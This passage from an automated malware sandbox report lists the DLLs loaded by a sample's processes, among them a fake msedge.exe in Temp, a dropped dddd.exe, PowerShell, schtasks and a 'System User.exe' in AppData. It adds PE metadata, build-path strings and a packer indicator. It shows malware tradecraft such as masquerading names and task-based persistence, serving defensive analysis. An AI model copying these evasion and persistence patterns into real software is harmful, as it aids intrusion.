                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: YgJ5inWPQO.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: YgJ5inWPQO.exeStatic file information: File size 7714025 > 1048576
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: YgJ5inWPQO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1471950558.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1472115949.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464730716.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbI source: dddd.exe, 0000000E.00000002.1744595376.000002624C77F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C710000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463949860.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1465060554.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C7A1000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdb source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
